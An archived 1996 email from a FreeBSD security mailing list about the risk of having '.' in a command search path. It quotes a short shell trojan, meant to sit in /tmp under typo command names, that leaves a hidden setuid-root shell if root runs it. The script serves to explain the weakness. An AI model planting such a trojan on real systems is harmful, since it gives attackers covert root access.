From owner-freebsd-security  Tue Jun 25 01:35:40 1996
Return-Path: owner-security
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.5/8.7.3) id BAA02066
          for security-outgoing; Tue, 25 Jun 1996 01:35:40 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26])
          by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02046;
          Tue, 25 Jun 1996 01:35:32 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14088; Tue, 25 Jun 1996 01:33:22 -0700 (PDT)
Date: Tue, 25 Jun 1996 01:33:21 -0700 (PDT)
From: -Vince- <vince@mercury.gaianet.net>
To: Joerg Wunsch <joerg_wunsch@uriah.heep.sax.de>
cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net,
        jbhunt@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250758.JAA17930@uriah.heep.sax.de>
Message-ID: <Pine.BSF.3.91.960625013239.21697l-100000@mercury.gaianet.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, J Wunsch wrote:

> As David Greenman wrote:
> 
> >    Actually, this particular problem can be avoided by putting "." last in
> > the search path rather than first.
> 
> But only until someone drops this script e.g. into /tmp:
> 
> #!/bin/sh
> 
> if [ `id -u -r` = 0 ] ; then
> 	(cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak;
> 	chmod 04755 $HOME/.newsrc.bak) &
> fi
> 
> echo "$0: not found."
> exit 1
> 
> 
> ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc.

	Hmmm, I never thought they can get you in the /tmp directory...

Vince